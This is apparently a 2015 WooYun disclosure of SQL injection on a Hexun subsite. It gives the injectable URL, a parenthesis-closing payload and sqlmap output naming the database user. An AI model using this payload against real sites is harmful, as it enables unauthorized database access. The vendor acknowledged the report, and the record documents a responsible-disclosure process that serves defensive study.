漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-092602
漏洞标题:和讯网分站注射再来一发
相关厂商:和讯网
漏洞作者: greg.wu
提交时间:2015-01-19 10:10
修复时间:2015-03-05 10:12
公开时间:2015-03-05 10:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开
简要描述:
发现和讯网最近给分高了,挖洞的积极性都提升了,再射一发~
详细说明:
注入点:
http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27,%2725144711%27,%2725144761%27,%2725147204%27,%2725178838%27,%2725178866%27,%2725179068%27,%2725184126%27,%2725185826%27&_=1421384235342
目测是in (xxx)类型的注射,所以用括号闭合就好了
http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27) and (1=1&_=1421384235342
漏洞证明:
没必要上图了,直接上数据证明一下就好
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2005
[23:01:31] [INFO] fetching current user
[23:01:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:01:31] [INFO] retrieved: dbreader
current user: 'dbreader'
修复方案:
你懂的
版权声明:转载请注明来源 greg.wu@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-01-19 10:11
厂商回复:
谢谢提醒,处理中。
最新状态:
暂无